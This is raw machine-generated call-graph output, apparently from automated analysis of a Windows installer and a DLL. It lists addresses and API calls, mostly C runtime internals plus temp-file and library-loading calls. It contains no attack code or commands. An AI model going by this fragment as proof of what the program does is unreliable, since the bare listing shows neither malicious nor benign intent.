6240->6261 6241->6207 6243 344b2908 6245 344b35d2 __CxxThrowException@8 RaiseException 6243->6245 6244->6243 6268 344b35d2 6244->6268 6247 344b2925 6245->6247 6247->6207 6249 344b160c _strlen 6248->6249 6250 344b163c lstrlenW 6249->6250 6356 344b1c9d 6250->6356 6252 344b1655 lstrcatW lstrlenW 6253 344b1678 6252->6253 6254 344b167e lstrcatW 6253->6254 6255 344b1693 ___scrt_fastfail 6253->6255 6254->6255 6255->6207 6271 344b4793 6256->6271 6259 344b478f 6259->6240 6260 344b4765 6277 344b2ada 6260->6277 6266 344b56d0 __dosmaperr 6261->6266 6262 344b570e 6290 344b6368 6262->6290 6264 344b56f9 RtlAllocateHeap 6265 344b570c 6264->6265 6264->6266 6265->6240 6266->6262 6266->6264 6267 344b474f __dosmaperr 7 API calls 6266->6267 6267->6266 6269 344b35f2 RaiseException 6268->6269 6269->6243 6272 344b479f ___DestructExceptionObject 6271->6272 6284 344b5671 RtlEnterCriticalSection 6272->6284 6274 344b47aa 6285 344b47dc 6274->6285 6276 344b47d1 _abort 6276->6260 6278 344b2ae3 6277->6278 6279 344b2ae5 IsProcessorFeaturePresent 6277->6279 6278->6259 6281 344b2b58 6279->6281 6289 344b2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6281->6289 6283 344b2c3b 6283->6259 6284->6274 6288 344b56b9 RtlLeaveCriticalSection 6285->6288 6287 344b47e3 6287->6276 6288->6287 6289->6283 6293 344b5b7a GetLastError 6290->6293 6294 344b5b99 6293->6294 6295 344b5b93 6293->6295 6299 344b5bf0 SetLastError 6294->6299 6319 344b637b 6294->6319 6312 344b5e08 6295->6312 6302 344b5bf9 6299->6302 6300 344b5bb3 6326 344b571e 6300->6326 6302->6265 6305 344b5bb9 6307 344b5be7 SetLastError 6305->6307 6306 344b5bcf 6339 344b593c 6306->6339 6307->6302 6310 344b571e _free 17 API calls 6311 344b5be0 6310->6311 6311->6299 6311->6307 6344 344b5c45 6312->6344 6314 344b5e2f 6315 344b5e3b 6314->6315 6316 344b5e47 TlsGetValue 6314->6316 6317 344b2ada _ValidateLocalCookies 5 API calls 6315->6317 6316->6315 6318 344b5e58 6317->6318 6318->6294 6324 344b6388 __dosmaperr 6319->6324 6320 344b63c8 6323 344b6368 _free 19 API calls 6320->6323 6321 344b63b3 RtlAllocateHeap 6322 344b5bab 6321->6322 6321->6324 6322->6300 6332 344b5e5e 6322->6332 6323->6322 6324->6320 6324->6321 6325 344b474f __dosmaperr 7 API calls 6324->6325 6325->6324 6327 344b5729 HeapFree 6326->6327 6328 344b5752 _free 6326->6328 6327->6328 6329 344b573e 6327->6329 6328->6305 6330 344b6368 _free 18 API calls 6329->6330 6331 344b5744 GetLastError 6330->6331 6331->6328 6333 344b5c45 __dosmaperr 5 API calls 6332->6333 6334 344b5e85 6333->6334 6335 344b5ea0 TlsSetValue 6334->6335 6337 344b5e94 6334->6337 6335->6337 6336 344b2ada _ValidateLocalCookies 5 API calls 6338 344b5bc8 6336->6338 6337->6336 6338->6300 6338->6306 6350 344b5914 6339->6350 6348 344b5c71 6344->6348 6349 344b5c75 __crt_fast_encode_pointer 6344->6349 6345 344b5c95 6347 344b5ca1 GetProcAddress 6345->6347 6345->6349 6346 344b5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6346->6348 6347->6349 6348->6345 6348->6346 6348->6349 6349->6314 6351 344b5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6350->6351 6352 344b5938 6351->6352 6353 344b58c4 6352->6353 6354 344b5758 __dosmaperr 20 API calls 6353->6354 6355 344b58e8 6354->6355 6355->6310 6357 344b1ca6 _strlen 6356->6357 6357->6252 7016 344b20db 7019 344b20e7 ___DestructExceptionObject 7016->7019 7017 344b20f6 7018 344b2110 dllmain_raw 7018->7017 7020 344b212a 7018->7020 7019->7017 7019->7018 7024 344b210b 7019->7024 7029 344b1eec 7020->7029 7022 344b2177 7022->7017 7023 344b1eec 31 API calls 7022->7023 7025 344b218a 7023->7025 7024->7017 7024->7022 7026 344b1eec 31 API calls 7024->7026 7025->7017 7027 344b2193 dllmain_raw 7025->7027 7028 344b216d dllmain_raw 7026->7028 7027->7017 7028->7022 7030 344b1f2a dllmain_crt_process_detach 7029->7030 7031 344b1ef7 7029->7031 7036 344b1f06 7030->7036 7032 344b1f1c dllmain_crt_process_attach 7031->7032 7033 344b1efc 7031->7033 7032->7036 7034 344b1f12 7033->7034 7035 344b1f01 7033->7035 7044 344b23ec 7034->7044 7035->7036 7039 344b240b 7035->7039 7036->7024 7052 344b53e5 7039->7052 7150 344b3513 7044->7150 7047 344b23f5 7047->7036 7050 344b2408 7050->7036 7051 344b351e 7 API calls 7051->7047 7058 344b5aca 7052->7058 7055 344b351e 7134 344b3820 7055->7134 7057 344b2415 7057->7036 7059 344b5ad4 7058->7059 7062 344b2410 7058->7062 7060 344b5e08 __dosmaperr 11 API calls 7059->7060 7061 344b5adb 7060->7061 7061->7062 7063 344b5e5e __dosmaperr 11 API calls 7061->7063 7062->7055 7064 344b5aee 7063->7064 7066 344b59b5 7064->7066 7067 344b59d0 7066->7067 7068 344b59c0 7066->7068 7067->7062 7072 344b59d6 7068->7072 7071 344b571e _free 20 API calls 7071->7067 7073 344b59e9 7072->7073 7074 344b59ef 7072->7074 7075 344b571e _free 20 API calls 7073->7075 7076 344b571e _free 20 API calls 7074->7076 7075->7074 7077 344b59fb 7076->7077 7078 344b571e _free 20 API calls 7077->7078 7079 344b5a06 7078->7079 7080 344b571e _free 20 API calls 7079->7080 7081 344b5a11 7080->7081 7082 344b571e _free 20 API calls 7081->7082 7083 344b5a1c 7082->7083 7084 344b571e _free 20 API calls 7083->7084 7085 344b5a27 7084->7085 7086 344b571e _free 20 API calls 7085->7086 7087 344b5a32 7086->7087 7088 344b571e _free 20 API calls 7087->7088 7089 344b5a3d 7088->7089 7090 344b571e _free 20 API calls 7089->7090 7091 344b5a48 7090->7091 7092 344b571e _free 20 API calls 7091->7092 7093 344b5a56 7092->7093 7098 344b589c 7093->7098 7104 344b57a8 7098->7104 7100 344b58c0 7101 344b58ec 7100->7101 7117 344b5809 7101->7117 7103 344b5910 7103->7071 7105 344b57b4 ___DestructExceptionObject 7104->7105 7112 344b5671 RtlEnterCriticalSection 7105->7112 7107 344b57e8 7113 344b57fd 7107->7113 7109 344b57f5 _abort 7109->7100 7110 344b57be 7110->7107 7111 344b571e _free 20 API calls 7110->7111 7111->7107 7112->7110 7116 344b56b9 RtlLeaveCriticalSection 7113->7116 7115 344b5807 7115->7109 7116->7115 7118 344b5815 ___DestructExceptionObject 7117->7118 7125 344b5671 RtlEnterCriticalSection 7118->7125 7120 344b581f 7126 344b5a7f 7120->7126 7122 344b5832 7130 344b5848 7122->7130 7124 344b5840 _abort 7124->7103 7125->7120 7127 344b5ab5 __fassign 7126->7127 7128 344b5a8e __fassign 7126->7128 7127->7122 7128->7127 7129 344b7cc2 __fassign 20 API calls 7128->7129 7129->7127 7133 344b56b9 RtlLeaveCriticalSection 7130->7133 7132 344b5852 7132->7124 7133->7132 7135 344b382d 7134->7135 7136 344b384b ___vcrt_freefls@4 7134->7136 7139 344b383b 7135->7139 7140 344b3b67 7135->7140 7136->7057 7145 344b3ba2 7139->7145 7141 344b3a82 try_get_function 5 API calls 7140->7141 7142 344b3b81 7141->7142 7143 344b3b99 TlsGetValue 7142->7143 7144 344b3b8d 7142->7144 7143->7144 7144->7139 7146 344b3a82 try_get_function 5 API calls 7145->7146 7147 344b3bbc 7146->7147 7148 344b3bcb 7147->7148 7149 344b3bd7 TlsSetValue 7147->7149 7148->7136 7149->7148 7156 344b3856 7150->7156 7152 344b23f1 7152->7047 7153 344b53da 7152->7153 7154 344b5b7a __dosmaperr 20 API calls 7153->7154 7155 344b23fd 7154->7155 7155->7050 7155->7051 7157 344b385f 7156->7157 7158 344b3862 GetLastError 7156->7158 7157->7152 7159 344b3b67 ___vcrt_FlsGetValue 6 API calls 7158->7159 7160 344b3877 7159->7160 7161 344b38dc SetLastError 7160->7161 7162 344b3ba2 ___vcrt_FlsSetValue 6 API calls 7160->7162 7167 344b3896 7160->7167 7161->7152 7163 344b3890 7162->7163 7164 344b38b8 7163->7164 7165 344b3ba2 ___vcrt_FlsSetValue 6 API calls 7163->7165 7163->7167 7166 344b3ba2 ___vcrt_FlsSetValue 6 API calls 7164->7166 7164->7167 7165->7164 7166->7167 7167->7161 7998 344b4bdd 7999 344b4c08 7998->7999 8000 344b4bec 7998->8000 8001 344b6d60 51 API calls 7999->8001 8000->7999 8002 344b4bf2 8000->8002 8003 344b4c0f GetModuleFileNameA 8001->8003 8004 344b6368 _free 20 API calls 8002->8004 8007 344b4c33 8003->8007 8005 344b4bf7 8004->8005 8006 344b62ac ___std_exception_copy 26 API calls 8005->8006 8008 344b4c01 8006->8008 8021 344b4d01 8007->8021 8013 344b4c72 8015 344b4d01 38 API calls 8013->8015 8014 344b4c66 8016 344b6368 _free 20 API calls 8014->8016 8017 344b4c88 8015->8017 8020 344b4c6b 8016->8020 8019 344b571e _free 20 API calls 8017->8019 8017->8020 8018 344b571e _free 20 API calls 8018->8008 8019->8020 8020->8018 8023 344b4d26 8021->8023 8025 344b4d86 8023->8025 8033 344b70eb 8023->8033 8024 344b4c50 8027 344b4e76 8024->8027 8025->8024 8026 344b70eb 38 API calls 8025->8026 8026->8025 8028 344b4e8b 8027->8028 8029 344b4c5d 8027->8029 8028->8029 8030 344b637b __dosmaperr 20 API calls 8028->8030 8029->8013 8029->8014 8031 344b4eb9 8030->8031 8032 344b571e _free 20 API calls 8031->8032 8032->8029 8036 344b7092 8033->8036 8037 344b54a7 __fassign 38 API calls 8036->8037 8038 344b70a6 8037->8038 8038->8023 7847 344b5351 7848 344b5374 7847->7848 7849 344b5360 7847->7849 7850 344b571e _free 20 API calls 7848->7850 7849->7848 7851 344b571e _free 20 API calls 7849->7851 7852 344b5386 7850->7852 7851->7848 7853 344b571e _free 20 API calls 7852->7853 7854 344b5399 7853->7854 7855 344b571e _free 20 API calls 7854->7855 7856 344b53aa 7855->7856 7857 344b571e _free 20 API calls 7856->7857 7858 344b53bb 7857->7858 7168 344b36d0 7169 344b36e2 7168->7169 7170 344b36f0 @_EH4_CallFilterFunc@8 7168->7170 7171 344b2ada _ValidateLocalCookies 5 API calls 7169->7171 7171->7170 7172 344b4ed7 7183 344b6d60 7172->7183 7178 344b571e _free 20 API calls 7179 344b4f29 7178->7179 7180 344b4eff 7181 344b571e _free 20 API calls 7180->7181 7182 344b4ef4 7181->7182 7182->7178 7184 344b4ee9 7183->7184 7185 344b6d69 7183->7185 7187 344b7153 GetEnvironmentStringsW 7184->7187 7216 344b6c5f 7185->7216 7188 344b71bd 7187->7188 7189 344b716a 7187->7189 7190 344b4eee 7188->7190 7191 344b71c6 FreeEnvironmentStringsW 7188->7191 7192 344b7170 WideCharToMultiByte 7189->7192 7190->7182 7199 344b4f2f 7190->7199 7191->7190 7192->7188 7193 344b718c 7192->7193 7194 344b56d0 21 API calls 7193->7194 7195 344b7192 7194->7195 7196 344b7199 WideCharToMultiByte 7195->7196 7197 344b71af 7195->7197 7196->7197 7198 344b571e _free 20 API calls 7197->7198 7198->7188 7200 344b4f44 7199->7200 7201 344b637b __dosmaperr 20 API calls 7200->7201 7202 344b4f6b 7201->7202 7205 344b637b __dosmaperr 20 API calls 7202->7205 7206 344b4fd1 7202->7206 7208 344b544d ___std_exception_copy 26 API calls 7202->7208 7210 344b4ff3 7202->7210 7213 344b571e _free 20 API calls 7202->7213 7214 344b4fcf 7202->7214 7203 344b571e _free 20 API calls 7204 344b4fe9 7203->7204 7204->7180 7205->7202 7207 344b5000 20 API calls 7206->7207 7209 344b4fd7 7207->7209 7208->7202 7211 344b571e _free 20 API calls 7209->7211 7212 344b62bc ___std_exception_copy 11 API calls 7210->7212 7211->7214 7215 344b4fff 7212->7215 7213->7202 7214->7203 7217 344b5af6 _abort 38 API calls 7216->7217 7218 344b6c6c 7217->7218 7219 344b6d7e __fassign 38 API calls 7218->7219 7220 344b6c74 7219->7220 7236 344b69f3 7220->7236 7223 344b6c8b 7223->7184 7226 344b6cce 7228 344b571e _free 20 API calls 7226->7228 7228->7223 7230 344b6cc9 7231 344b6368 _free 20 API calls 7230->7231 7231->7226 7232 344b6d12 7232->7226 7260 344b68c9 7232->7260 7233 344b6ce6 7233->7232 7234 344b571e _free 20 API calls 7233->7234 7234->7232 7237 344b54a7 __fassign 38 API calls 7236->7237 7238 344b6a05 7237->7238 7239 344b6a26 7238->7239 7240 344b6a14 GetOEMCP 7238->7240 7241 344b6a3d 7239->7241 7242 344b6a2b GetACP 7239->7242 7240->7241 7241->7223 7243 344b56d0 7241->7243 7242->7241 7244 344b570e 7243->7244 7248 344b56de __dosmaperr 7243->7248 7245 344b6368 _free 20 API calls 7244->7245 7247 344b570c 7245->7247 7246 344b56f9 RtlAllocateHeap 7246->7247 7246->7248 7247->7226 7250 344b6e20 7247->7250 7248->7244 7248->7246 7249 344b474f __dosmaperr 7 API calls 7248->7249 7249->7248 7251 344b69f3 40 API calls 7250->7251 7252 344b6e3f 7251->7252 7255 344b6e90 IsValidCodePage 7252->7255 7257 344b6e46 7252->7257 7259 344b6eb5 ___scrt_fastfail 7252->7259 7253 344b2ada _ValidateLocalCookies 5 API calls 7254 344b6cc1 7253->7254 7254->7230 7254->7233 7256 344b6ea2 GetCPInfo 7255->7256 7255->7257 7256->7257 7256->7259 7257->7253 7263 344b6acb GetCPInfo 7259->7263 7336 344b6886 7260->7336 7262 344b68ed 7262->7226 7264 344b6baf 7263->7264 7268 344b6b05 7263->7268 7267 344b2ada _ValidateLocalCookies 5 API calls 7264->7267 7270 344b6c5b 7267->7270 7273 344b86e4 7268->7273 7270->7257 7272 344b8a3e 43 API calls 7272->7264 7274 344b54a7 __fassign 38 API calls 7273->7274 7275 344b8704 MultiByteToWideChar 7274->7275 7277 344b87da 7275->7277 7278 344b8742 7275->7278 7279 344b2ada _ValidateLocalCookies 5 API calls 7277->7279 7280 344b56d0 21 API calls 7278->7280 7283 344b8763 ___scrt_fastfail 7278->7283 7281 344b6b66 7279->7281 7280->7283 7287 344b8a3e 7281->7287 7282 344b87d4 7292 344b8801 7282->7292 7283->7282 7285 344b87a8 MultiByteToWideChar 7283->7285 7285->7282 7286 344b87c4 GetStringTypeW 7285->7286 7286->7282 7288 344b54a7 __fassign 38 API calls 7287->7288 7289 344b8a51 7288->7289 7296 344b8821 7289->7296 7293 344b881e 7292->7293 7294 344b880d 7292->7294 7293->7277 7294->7293 7295 344b571e _free 20 API calls 7294->7295 7295->7293 7298 344b883c 7296->7298 7297 344b8862 MultiByteToWideChar 7299 344b888c 7297->7299 7310 344b8a16 7297->7310 7298->7297 7302 344b88ad 7299->7302 7303 344b56d0 21 API calls 7299->7303 7300 344b2ada _ValidateLocalCookies 5 API calls 7301 344b6b87 7300->7301 7301->7272 7304 344b88f6 MultiByteToWideChar 7302->7304 7306 344b8962 7302->7306 7303->7302 7305 344b890f 7304->7305 7304->7306 7323 344b5f19 7305->7323 7308 344b8801 __freea 20 API calls 7306->7308 7308->7310 7310->7300 7311 344b8939 7311->7306 7313 344b5f19 11 API calls 7311->7313 7312 344b8971 7315 344b56d0 21 API calls 7312->7315 7318 344b8992 7312->7318 7313->7306 7314 344b8a07 7317 344b8801 __freea 20 API calls 7314->7317 7315->7318 7316 344b5f19 11 API calls 7319 344b89e6 7316->7319 7317->7306 7318->7314 7318->7316 7319->7314 7320 344b89f5 WideCharToMultiByte 7319->7320 7320->7314 7321 344b8a35 7320->7321 7322 344b8801 __freea 20 API calls 7321->7322 7322->7306 7324 344b5c45 __dosmaperr 5 API calls 7323->7324 7325 344b5f40 7324->7325 7328 344b5f49 7325->7328 7331 344b5fa1 7325->7331 7329 344b2ada _ValidateLocalCookies 5 API calls 7328->7329 7330 344b5f9b 7329->7330 7330->7306 7330->7311 7330->7312 7332 344b5c45 __dosmaperr 5 API calls 7331->7332 7333 344b5fc8 7332->7333 7334 344b2ada _ValidateLocalCookies 5 API calls 7333->7334 7335 344b5f89 LCMapStringW 7334->7335 7335->7328 7337 344b6892 ___DestructExceptionObject 7336->7337 7344 344b5671 RtlEnterCriticalSection 7337->7344 7339 344b689c 7345 344b68f1 7339->7345 7343 344b68b5 _abort 7343->7262 7344->7339 7357 344b7011 7345->7357 7347 344b693f 7348 344b7011 26 API calls 7347->7348 7349 344b695b 7348->7349 7350 344b7011 26 API calls 7349->7350 7351 344b6979 7350->7351 7352 344b68a9 7351->7352 7353 344b571e _free 20 API calls 7351->7353 7354 344b68bd 7352->7354 7353->7352 7371 344b56b9 RtlLeaveCriticalSection 7354->7371 7356 344b68c7 7356->7343 7358 344b7022 7357->7358 7367 344b701e 7357->7367 7359 344b7029 7358->7359 7361 344b703c ___scrt_fastfail 7358->7361 7360 344b6368 _free 20 API calls 7359->7360 7362 344b702e 7360->7362 7364 344b706a 7361->7364 7365 344b7073 7361->7365 7361->7367 7363 344b62ac ___std_exception_copy 26 API calls 7362->7363 7363->7367 7366 344b6368 _free 20 API calls 7364->7366 7365->7367 7369 344b6368 _free 20 API calls 7365->7369 7368 344b706f 7366->7368 7367->7347 7370 344b62ac ___std_exception_copy 26 API calls 7368->7370 7369->7368 7370->7367 7371->7356 8039 344b73d5 8040 344b73e1 ___DestructExceptionObject 8039->8040 8051 344b5671 RtlEnterCriticalSection 8040->8051 8042 344b73e8 8052 344b8be3 8042->8052 8044 344b73f7 8045 344b7406 8044->8045 8065 344b7269 GetStartupInfoW 8044->8065 8076 344b7422 8045->8076 8048 344b7417 _abort 8051->8042 8053 344b8bef ___DestructExceptionObject 8052->8053 8054 344b8bfc 8053->8054 8055 344b8c13 8053->8055 8056 344b6368 _free 20 API calls 8054->8056 8079 344b5671 RtlEnterCriticalSection 8055->8079 8058 344b8c01 8056->8058 8059 344b62ac ___std_exception_copy 26 API calls 8058->8059 8061 344b8c0b _abort 8059->8061 8060 344b8c4b 8087 344b8c72 8060->8087 8061->8044 8062 344b8c1f 8062->8060 8080 344b8b34 8062->8080 8066 344b7286 8065->8066 8068 344b7318 8065->8068 8067 344b8be3 27 API calls 8066->8067 8066->8068 8069 344b72af 8067->8069 8071 344b731f 8068->8071 8069->8068 8070 344b72dd GetFileType 8069->8070 8070->8069 8075 344b7326 8071->8075 8072 344b7369 GetStdHandle 8072->8075 8073 344b73d1 8073->8045 8074 344b737c GetFileType 8074->8075 8075->8072 8075->8073 8075->8074 8091 344b56b9 RtlLeaveCriticalSection 8076->8091 8078 344b7429 8078->8048 8079->8062 8081 344b637b __dosmaperr 20 API calls 8080->8081 8082 344b8b46 8081->8082 8084 344b5eb7 11 API calls 8082->8084 8086 344b8b53 8082->8086 8083 344b571e _free 20 API calls 8085 344b8ba5 8083->8085 8084->8082 8085->8062 8086->8083 8090 344b56b9 RtlLeaveCriticalSection 8087->8090 8089 344b8c79 8089->8061 8090->8089 8091->8078 6892 344bac6b 6893 344bac84 __startOneArgErrorHandling 6892->6893 6894 344bacad __startOneArgErrorHandling 6893->6894 6896 344bb2f0 6893->6896 6897 344bb329 6896->6897 6899 344bb350 __startOneArgErrorHandling 6897->6899 6907 344bb5c1 6897->6907 6900 344bb393 6899->6900 6901 344bb36e 6899->6901 6920 344bb8b2 6900->6920 6911 344bb8e1 6901->6911 6904 344bb38e __startOneArgErrorHandling 6905 344b2ada _ValidateLocalCookies 5 API calls 6904->6905 6906 344bb3b7 6905->6906 6906->6894 6908 344bb5ec __raise_exc 6907->6908 6909 344bb7e5 RaiseException 6908->6909 6910 344bb7fd 6909->6910 6910->6899 6912 344bb8f0 6911->6912 6913 344bb90f __startOneArgErrorHandling 6912->6913 6914 344bb964 __startOneArgErrorHandling 6912->6914 6927 344b78a3 6913->6927 6916 344bb8b2 __startOneArgErrorHandling 20 API calls 6914->6916 6919 344bb95d 6916->6919 6918 344bb8b2 __startOneArgErrorHandling 20 API calls 6918->6919 6919->6904 6921 344bb8d4 6920->6921 6923 344bb8bf 6920->6923 6924 344b6368 _free 20 API calls 6921->6924 6922 344bb8d9 6922->6904 6923->6922 6925 344b6368 _free 20 API calls 6923->6925 6924->6922 6926 344bb8cc 6925->6926 6926->6904 6928 344b78cb 6927->6928 6929 344b2ada _ValidateLocalCookies 5 API calls 6928->6929 6930 344b78e8 6929->6930 6930->6918 6930->6919 6931 344b9e6b 6932 344b9e7d 6931->6932 6933 344b9f71 __startOneArgErrorHandling 6931->6933 6932->6933 6934 344b9ee6 6932->6934 6936 344bb2f0 21 API calls 6933->6936 6937 344bacad __startOneArgErrorHandling 6933->6937 6938 344b9ef8 6934->6938 6939 344baa53 6934->6939 6936->6937 6940 344baa70 RtlDecodePointer 6939->6940 6943 344baa80 6939->6943 6940->6943 6941 344bab0d 6945 344bab02 6941->6945 6946 344b6368 _free 20 API calls 6941->6946 6942 344b2ada _ValidateLocalCookies 5 API calls 6944 344bac67 6942->6944 6943->6941 6943->6945 6947 344baab7 6943->6947 6944->6938 6945->6942 6946->6945 6947->6945 6948 344b6368 _free 20 API calls 6947->6948 6948->6945 6949 344b506f 6950 344b5087 6949->6950 6951 344b5081 6949->6951 6953 344b5000 6951->6953 6954 344b500d 6953->6954 6955 344b502a 6953->6955 6956 344b5024 6954->6956 6958 344b571e _free 20 API calls 6954->6958 6955->6950 6957 344b571e _free 20 API calls 6956->6957 6957->6955 6958->6954 7372 405ee4 GetFileAttributesW CreateFileW 8092 344ba1e0 8095 344ba1fe 8092->8095 8094 344ba1f6 8098 344ba203 8095->8098 8096 344baa53 21 API calls 8099 344ba42f 8096->8099 8097 344ba298 8097->8094 8098->8096 8098->8097 8099->8094 8100 344b9de6 8102 344ba91b 8100->8102 8101 344ba940 8102->8101 8103 344baa17 21 API calls 8102->8103 8104 344ba93e 8103->8104 8105 344b5bff 8113 344b5d5c 8105->8113 8107 344b5c13 8109 344b5b7a __dosmaperr 20 API calls 8110 344b5c1b 8109->8110 8111 344b5c28 8110->8111 8112 344b5c2b 11 API calls 8110->8112 8112->8107 8114 344b5c45 __dosmaperr 5 API calls 8113->8114 8115 344b5d83 8114->8115 8116 344b5d9b TlsAlloc 8115->8116 8117 344b5d8c 8115->8117 8116->8117 8118 344b2ada _ValidateLocalCookies 5 API calls 8117->8118 8119 344b5c09 8118->8119 8119->8107 8119->8109 7859 344b3370 7870 344b3330 7859->7870 7871 344b334f 7870->7871 7872 344b3342 7870->7872 7873 344b2ada _ValidateLocalCookies 5 API calls 7872->7873 7873->7871 8120 344b63f0 8121 344b6400 8120->8121 8122 344b6416 8120->8122 8123 344b6368 _free 20 API calls 8121->8123 8132 344b6561 8122->8132 8133 344b6480 8122->8133 8139 344b6580 8122->8139 8124 344b6405 8123->8124 8125 344b62ac ___std_exception_copy 26 API calls 8124->8125 8127 344b640f 8125->8127 8126 344b4e76 20 API calls 8131 344b64e5 8126->8131 8129 344b64ee 8130 344b571e _free 20 API calls 8129->8130 8130->8132 8131->8129 8131->8131 8136 344b6573 8131->8136 8150 344b85eb 8131->8150 8159 344b679a 8132->8159 8133->8126 8137 344b62bc ___std_exception_copy 11 API calls 8136->8137 8138 344b657f 8137->8138 8140 344b658c 8139->8140 8140->8140 8141 344b637b __dosmaperr 20 API calls 8140->8141 8142 344b65ba 8141->8142 8143 344b85eb 26 API calls 8142->8143 8144 344b65e6 8143->8144 8145 344b62bc ___std_exception_copy 11 API calls 8144->8145 8146 344b6615 ___scrt_fastfail 8145->8146 8147 344b66b6 FindFirstFileExA 8146->8147 8148 344b6705 8147->8148 8149 344b6580 26 API calls 8148->8149 8153 344b853a 8150->8153 8151 344b854f 8152 344b8554 8151->8152 8154 344b6368 _free 20 API calls 8151->8154 8152->8131 8153->8151 8153->8152 8157 344b858b 8153->8157 8155 344b857a 8154->8155 8156 344b62ac ___std_exception_copy 26 API calls 8155->8156 8156->8152 8157->8152 8158 344b6368 _free 20 API calls 8157->8158 8158->8155 8163 344b67a4 8159->8163 8160 344b67b4 8162 344b571e _free 20 API calls 8160->8162 8161 344b571e _free 20 API calls 8161->8163 8164 344b67bb 8162->8164 8163->8160 8163->8161 8164->8127 7373 344b508a 7374 344b509c 7373->7374 7375 344b50a2 7373->7375 7376 344b5000 20 API calls 7374->7376 7376->7375 7377 344b8a89 7378 344b6d60 51 API calls 7377->7378 7379 344b8a8e 7378->7379 6959 344b220c 6960 344b221a dllmain_dispatch 6959->6960 6961 344b2215 6959->6961 6963 344b22b1 6961->6963 6964 344b22c7 6963->6964 6966 344b22d0 6964->6966 6967 344b2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6964->6967 6966->6960 6967->6966 7874 344b7103 GetCommandLineA GetCommandLineW 7875 344b5303 7878 344b50a5 7875->7878 7887 344b502f 7878->7887 7881 344b502f 5 API calls 7882 344b50c3 7881->7882 7883 344b5000 20 API calls 7882->7883 7884 344b50ce 7883->7884 7885 344b5000 20 API calls 7884->7885 7886 344b50d9 7885->7886 7888 344b5048 7887->7888 7889 344b2ada _ValidateLocalCookies 5 API calls 7888->7889 7890 344b5069 7889->7890 7890->7881 7380 344b7a80 7381 344b7a8d 7380->7381 7382 344b637b __dosmaperr 20 API calls 7381->7382 7383 344b7aa7 7382->7383 7384 344b571e _free 20 API calls 7383->7384 7385 344b7ab3 7384->7385 7386 344b637b __dosmaperr 20 API calls 7385->7386 7389 344b7ad9 7385->7389 7388 344b7acd 7386->7388 7387 344b5eb7 11 API calls 7387->7389 7390 344b571e _free 20 API calls 7388->7390 7389->7387 7391 344b7ae5 7389->7391 7390->7389 7891 405d0f lstrlenW 7892 405d1d 7891->7892 7893 405d23 CharPrevW 7892->7893 7894 405d2f 7892->7894 7893->7892 7893->7894 7392 344b4a9a 7395 344b5411 7392->7395 7396 344b541d _abort 7395->7396 7397 344b5af6 _abort 38 API calls 7396->7397 7400 344b5422 7397->7400 7398 344b55a8 _abort 38 API calls 7399 344b544c 7398->7399 7400->7398 6968 344b2418 6969 344b2420 ___scrt_release_startup_lock 6968->6969 6972 344b47f5 6969->6972 6971 344b2448 6973 344b4808 6972->6973 6974 344b4804 6972->6974 6977 344b4815 6973->6977 6974->6971 6978 344b5b7a __dosmaperr 20 API calls 6977->6978 6981 344b482c 6978->6981 6979 344b2ada _ValidateLocalCookies 5 API calls 6980 344b4811 6979->6980 6980->6971 6981->6979 6982 344b281c 6983 344b2882 std::exception::exception 27 API calls 6982->6983 6984 344b282a 6983->6984 7401 344b3c90 RtlUnwind 6985 344b742b 6988 344b7430 6985->6988 6987 344b7453 6988->6987 6989 344b8bae 6988->6989 6990 344b8bbb 6989->6990 6991 344b8bdd 6989->6991 6992 344b8bc9 RtlDeleteCriticalSection 6990->6992 6993 344b8bd7 6990->6993 6991->6988 6992->6992 6992->6993 6994 344b571e _free 20 API calls 6993->6994 6994->6991 7402 4034a2 SetErrorMode GetVersion 7403 4034f2 7402->7403 7425 406773 GetSystemDirectoryW 7403->7425 7405 4034fd lstrlenA 7405->7403 7406 40350d 7405->7406 7428 4067e3 GetModuleHandleA 7406->7428 7409 4067e3 5 API calls 7410 40351b 7409->7410 7411 4067e3 5 API calls 7410->7411 7412 403527 #17 OleInitialize SHGetFileInfoW 7411->7412 7434 4063ee lstrcpynW 7412->7434 7415 403573 GetCommandLineW 7435 4063ee lstrcpynW 7415->7435 7417 403585 7436 405cf0 7417->7436 7420 4036d4 GetTempPathW 7440 403471 7420->7440 7422 4036ec DeleteFileW 7424 403015 7422->7424 7426 406795 wsprintfW LoadLibraryExW 7425->7426 7426->7405 7429 406809 GetProcAddress 7428->7429 7430 4067ff 7428->7430 7432 403514 7429->7432 7431 406773 3 API calls 7430->7431 7433 406805 7431->7433 7432->7409 7433->7429 7433->7432 7434->7415 7435->7417 7437 405cf6 7436->7437 7438 4035aa CharNextW 7437->7438 7439 405cfd CharNextW 7437->7439 7438->7420 7439->7437 7450 40669d 7440->7450 7442 403487 7442->7422 7443 40347d 7443->7442 7459 405cc3 lstrlenW CharPrevW 7443->7459 7457 4066aa 7450->7457 7451 406720 7452 406725 CharPrevW 7451->7452 7455 406746 7451->7455 7452->7451 7453 406713 CharNextW 7453->7451 7453->7457 7454 405cf0 CharNextW 7454->7457 7455->7443 7456 4066ff CharNextW 7456->7457 7457->7451 7457->7453 7457->7454 7457->7456 7458 40670e CharNextW 7457->7458 7458->7453 7460 40348f 7459->7460 7461 405cdf lstrcatW 7459->7461 7462 4059a2 CreateDirectoryW 7460->7462 7461->7460 7463 403495 7462->7463 7464 4059b6 GetLastError 7462->7464 7465 405f13 7463->7465 7464->7463 7466 405f20 GetTickCount GetTempFileNameW 7465->7466 7467 4034a0 7466->7467 7468 405f56 7466->7468 7467->7422 7468->7466 7468->7467 7469 344b60ac 7470 344b60dd 7469->7470 7471 344b60b7 7469->7471 7471->7470 7472 344b60c7 FreeLibrary 7471->7472 7472->7471 8165 344b21a1 ___scrt_dllmain_exception_filter 8166 344b81a0 8167 344b81d9 8166->8167 8168 344b81dd 8167->8168 8179 344b8205 8167->8179 8169 344b6368 _free 20 API calls 8168->8169 8171 344b81e2 8169->8171 8170 344b8529 8172 344b2ada _ValidateLocalCookies 5 API calls 8170->8172 8173 344b62ac ___std_exception_copy 26 API calls 8171->8173 8174 344b8536 8172->8174 8175 344b81ed 8173->8175 8176 344b2ada _ValidateLocalCookies 5 API calls 8175->8176 8177 344b81f9 8176->8177 8179->8170 8180 344b80c0 8179->8180 8183 344b80db 8180->8183 8181 344b2ada _ValidateLocalCookies 5 API calls 8182 344b8152 8181->8182 8182->8179 8183->8181 6358 344bc7a7 6359 344bc7be 6358->6359 